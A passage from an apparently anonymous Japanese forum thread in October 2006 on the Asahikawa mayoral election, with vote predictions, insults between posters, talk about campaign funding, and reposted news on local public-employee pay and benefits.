■旭川市長選挙即日開票(開票率100%)■
※投票率57%(投票総数約169,000票)

西川まさひと(無・新)当64,000(民主推薦)
かとう礼一 (無・新)・・61,000(自民推薦・公明支持)
安住太伸  (無・新)・・28,000
おぎう和敏 (無・新)・・12,500(共産推薦)
神崎実    (無・新)・・・3,500

この予想、誤差500票くらいで当たったら何かくれ。
西川くん、俺を助役にしてくれ。

287 :名無しさん :2006/10/27(金) 23:39 ID:kAcPUY1Q
今回も開票センターで謎の500票のタバがポケットから出てくるのかな?

288 :名無しさん :2006/10/27(金) 23:42 ID:kAcPUY1Q
>>285
オマエもその馬鹿経営者どもから給料もらって日々生きてるんだろうが。
偽善も大概にしないと。

それとも税金に喰らって生きながらえてんのか?笑止。

289 :名無しさん :2006/10/28(土) 00:25 ID:mVSEJi8o
死票はもったいない
投票しよう

290 :明日は思いっ切り飲むぞ!の月光仮面 :2006/10/28(土) 01:44 ID:PvljN3zc
馬鹿が!!!>288
馬鹿経営者から給料貰ってる訳じゃないし
政治屋の顔色うかがってる公務員でもないし!
何の利害もなしに細々と生きてる人間だ!
偽善だと!あほらし。
反論するなら、しっかり理論立てて反論しろよ!
ちゃんと議論するなら、明日10/28 20:00に丸井今井前に来い!
その阿保づら見てやるよ。

291 :名無しさん :2006/10/28(土) 02:24 ID:P5fwwz/s
深夜に随分威勢がいいですね

292 :名無しさん :2006/10/28(土) 03:02 ID:QqK38lbQ
>>290
共産党、乙。
威勢が良いのは結構だけど、その前にレスアンカー位ちゃんとつけろや。

293 :名無しさん :2006/10/28(土) 03:07 ID:QqK38lbQ
>>290
理論立てて反論しろと言うとるが
その前にお前の書き込みのどこが理論的なのかと
小一時間問い詰めたいw

294 :名無しさん :2006/10/28(土) 08:59 ID:Prk0Zuzk
西川の選挙資金の出所が知りたい。
自己資金ゼロじゃできないから、
300万×6回としても1,800万
参院と市長選で1回自己資金300万ってのも低すぎる設定だがw
まー、借金ってのもあるが・・

295 :名無しさん :2006/10/28(土) 09:18 ID:XS3NjCNM
20時に丸井前に来いという月光仮面は西川支持者か。
西川の最終街演に行くわけでしょ?

つか、西川だって「馬鹿経営者」や「政治屋」とズブズブなんすけどね。
労組噛んでる分タチ悪かったりする。

296 :名無しさん :2006/10/28(土) 09:26 ID:XS3NjCNM
選挙資金は300万じゃ足りない。
保守系の市議で1回500万は必要と言われとります。

前回市長選の場合、僅差で落選した候補が約2000万かかったとの事。
現市長はさらに上回ったそうです。
「それじゃ法定費用が云々・・・」とか野暮な事は言わないように(笑)

297 :名無しさん :2006/10/28(土) 10:54 ID:6l.t6gc2
税金から運営費の補助を受けて公務員の福利厚生事業を行っている組合が、職員の退職時に
400万円を超す給付金を支給するなど職員に過大な給付や助成をしているケースが多い
ことがわかり、会計検査院は、住民に納得してもらえる事業に改めるよう自治体に求めました。
 ̄ ̄ ̄ ̄ ̄ ̄∨ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
 彡ミ    ___  __    * 警察・司法も仲間だから公務員は平気で犯罪をやる。
  |ヽ  /|  ,,,,,,,,l /  / それが権力だと思い上がって悪いのはすべて国民にしようとする。
  |ヽ   | | ミ#・д・ミ/_/旦~~ 
  ⊥   |  ̄| ̄|| ̄ ̄ ̄ ̄ ̄| だから公務員は自分を正当化しようとして
  凵    `TT | ̄l ̄ ̄ ̄ ̄ ̄l 一般国民に病的な敵意を持ってますよね。(・A・#)

06.10.19 NHK「互助組合 退職時に過大給付金」
http://www.nhk.or.jp/news/2006/10/19/k20061019000018.html
06.10.19 NHK「公務員 重複手当110億円超」
http://www.nhk.or.jp/news/2006/10/19/k20061018000158.html

* 公務員らはこの問題に関しても国民同士の争いに転化しようとします。

298 :名無しさん :2006/10/28(土) 11:40 ID:T8jaAKQc
なんでもいいから、旭川の市役所潰してくれ!なんかあそこ行くとダメ人間の集まりに思える。

299 :名無しさん :2006/10/28(土) 12:34 ID:6l.t6gc2
地方公務員の給与、民間より21%高く・財務省昨年調べ

財務省が2005年の全国47都道府県の地方公務員の給与を調べたところ、
各地域の民間企業の給与と比べて平均で約21%高いことが分かった。
国家公務員の給与は約6%高。東北や九州では3―4割弱高い自治体も
目立ち、地方公務員の給与水準が民間とかけ離れている実態が改めて
浮き彫りになった。
民間給与は厚生労働省が各地域の従業員100人以上の企業を対象に
集計した金額を採用。地方公務員給与は、各都道府県の人事委員会が
各自治体の首長らに勧告した額を用いた。実際の給与を勧告より
減額している自治体もある。 (07:00)
http://www.nikkei.co.jp/news/main/20060823AT3S2201822082006.html

300 :名無しさん :2006/10/28(土) 12:39 ID:lRoDsS4.
今度は永山に市役所移す気ですか?
自民支持者の土建屋の皆さん。

135 KB  
続きを読む

掲示板に戻る 全部 前100 次100 最新50
名前: E-mail (省略可) :

read.cgi ver2.0 beta3 (03/08/25)